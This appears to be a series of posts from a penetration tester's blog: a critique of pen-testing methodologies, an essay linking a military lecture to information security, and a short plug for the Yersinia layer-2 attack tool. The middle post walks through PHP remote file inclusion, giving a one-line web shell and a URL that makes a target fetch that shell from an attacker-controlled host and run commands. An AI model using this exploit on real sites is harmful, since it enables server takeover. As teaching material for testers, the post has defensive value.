Penetration Testing Methodology: Fact or Fiction?

I had a blog reader over the weekend shoot me an email asking me about my opinion on what the best penetration testing methodolgy is. I've performed a couple of hundred penetration tests, and I can say that over the last couple of years I've been exposed to (maybe I should say subjected to?) about a dozen different methodologies at different points in time. (BTW: If you have something you'd like me to write about, I'm open to suggestions!) I've seen both in-house and "industry standard" methodologies. If you aren't familiar with penetration testing methodologies, the idea behind them is that the penetration tester should follow a pre-scripted format for orchestrating the test as dictated by the methodology. Here are some of the 3 popular ones that come to mind:

The OSSTMM
NIST 4-Stage Pen-Testing Guideline
FoundStone's Pen-Testing Methodology

Now, what the reader was hoping for was a succinct, clear cut, answer. "Go here, download this, print it out, done, etc.". As you might have already guessed, I'm not going to give that level of satisfaction. And, I'm asked this question almost weekly, so now I'll be able to point people to this blog posting for the long winded answer. Ok, on to the answer.

In a nutshell, I firmly believe that any penetration testing methodology, no matter how well thought out, has limited usefulness. Why? Well the goal behind penetration testing is to try to find as many serious vulnerabilities as possible. In order to do this, you must develop the "mindset" of your attacker. You should look at your assessed system or application in all of the possible ways you think it could be misued, abused and exploited. You should then take a break, drink some well-deserved coffee, and then think of entirely new "misuse cases" for the system under review. Using a cut and dry methodology runs counter to the basic and essential premise of penetration testing; that a penetration test is an exercise in system abuse and cannot be readily scripted.

I realize that if you have never performed a penetration test, and don't have the faintest idea where to begin, you might get some value of out a methodology. However, I would venture to say that your time would be better spent hacking away on some dedicated lab equipment, writing your first Metasploit module, or writing a proposal for your boss to send you to a decent penetration testing course.

I also realize that the other (and in my eyes, more legitmate) reason to use a penetration testing methodology is the CYA factor. Most managers don't like the idea of employees willy-nilly hacking into things. The idea that an "industry standard methodology is being applied in accordance to best practices" sounds a lot better to the person in the corner office. Then, the methodology becomes more of a documentation tool, which I do see real value in.

Before I get too positive on documentation, remember what we have seen with vulnerability scanners. Generating lots of documentation can equally as dangerous. Everyone knows what has happened in the last 5 years with "vulnerablity assessment reports" generated out of nessus/internet scanner/etc. We all know the process:

1. Your boxes are rooted by 16 yr old dude in norway, he uses them to serve phising bait to 100 million paypal users.
2. High priced consultants run nessus for you, charge your company $50,000, take you out for drinks one night, generate a monster 500 page report.
3. So many false positivies and false negatives in the report no real vulns are ever acted on
4. Next month the same kid has your Oracle production E10000 serving PsyBNC to half of the norweigan underground.

Documentation can be paralyzing. It can be useless and point people down the wrong path, with end effect of people losing faith in the entire assessment process.

To sum up: Don't use a methodology unless you need to for documentation purposes, if you do, make sure the reports you generate deliver actionable intelligence on the security posture of the asssessed system.

Thoughts?

Jack

The New Face of War & Hacking PHP

A couple of weeks ago I attended a lecture at the Pritzker Military Library given by Bruce Berkowitz. You can actually watch the archived lecture here. The library is about as atypical for a library as it gets. It is essentially a personal collection of 12,000 military related books and other assorted artifacts donated really, really rich guy that spent some time in the Army. It's on the third floor of a commercial building in downtown Chicago, which also happens to house a Chipolte, a whole flock of lawyers (what do you call a bunch of lawyers? a gaggle?) and one of my favorite indian resturants.

Anyway, the subject of the lecture was on the new ways that wars are being fought now that communication systems have drastically changed. From the Peloponnesian War (great book if you are interested in military history here) to the First Gulf War, communication in battle has stayed roughly the same. Military units are divided into smaller hierarchical groups, and commands are passed down from the top. Spear-throwing Spartans, English Longbowmen, and German 88MM Flak artillerymen all communicated by essentially shouting orders at each other, trying to find the enemy and direct fire at it as accurately as possible. What has changed, and hence the title of the lecture, the New Face of War, is that weapons are now so incredibly accurate that whomever has the best communication system in battle will likely win. Example: when a modern M1A1 Abrams tank fires at shot it has a 90% of taking out its target, compared to 10% for WWII era M4 Sherman Tank. Roughly the same percentages apply for WWII era bombs dropped from a B-17 and modern smart bombs, as well as modern infantry equipped night vision goggles vs. WWII infantry, etc.

So, if first shot equals a kill most of the time, whoever can find the enemy, point his super accurate weapon at him will win most of the time. It all comes down to the communication system.

Now, in Mr. Berkowitz's lecture, he was talking about military systems in the aggregate, whoever has the best satilites, comm gear, radio systems, radar, etc. will win the battle. But, you can easily apply this to the much narrower field (and one that is more relevant for blog readers) of information security. In today's IT landscape, whomever finds the vulnerable app first wins. If the bad guys realize before your security staff that some dopey developers have stored production data in unsecured test systems (ala CardSystems), you are going to get killed (and in CardSystems' case, literally!). The other point to be made here is who the enemy is. In most cases, the enemy is your own stuff. The split tunnel VPN you allow into your corporate network. The unpatched boxes on the SIPRNET. The web application that no one bothered to test for security bugs.

Speaking of vulnerable web applications, I have yet to find an application written in PHP that isn't vulnerable. I'm kind of biased, because I usually am asked to assess web apps because they are suspected of being vulnerable. One of the first things to check for when attacking a PHP app is PHP source code injection. The idea behind PHP source injection is to force the application to load a hostile PHP script from another server controlled by the attacker. With PHP, you can set the value stored in any global variable via a get request. If that variable happens to be used in a an include construction like so:

include ("$load.php")

You can manipulate the value stored in $load with a simple GET request from a broswer:

http://vulnerabledork.com/accnt.php?load=test

If the PHP interpreter attempts to load the value test, and you get an error like so:

Warning: main(): Failed opening 'test' for inclusion

You know the app is vulnerable, because the PHP interpreter is attempting to load a php file called "test" which does not exist, so you get the above error. Exploiting this is super easy. Just stick a PHP script on another server (the vulnerable server must allow outbound port 80 connections), simply stuff your hostile PHP script into the vulnerable app. Create a hostile PHP script (called hostile in this example) that loads the shell interpreter:

system($_GET["cmd'])

And now force the vulnerable program to load our hostile script:

http://vulnerabledork.com/accnt.php?load=http://www.attacker.com/hostile?&cmd=ls

If you get a directory listing of the web root, guess what? You have found the vulnerability, and my guess is that you would have BETTER than a 90% chance of killing your target.

Jack

Blog is back & Yersinia

Ok, well I have been super lazy about this blog in the last 6 months, and now it is time to get back into it. I'll try to keep the posts shorter, this will allow me to post more often.

One really kick ass program that has been in heavy use by a lot of pen testers out there, but has not really been picked up by general security pros is Yersinia. Yersinia allows you to play with all sorts of layer 2 protocols that you would otherwise have to do with netdude or a heck of a lot of scripting. The most useful attacks in a pen testing situation where network gear is in scope, are for VLAN hacking and VLAN hopping. The other DoS attacks for CDP and STP are useful, but DoSing your local broadcast domain isn't that big of a deal. Check out some network hacking output from Yersinia here.

- Jack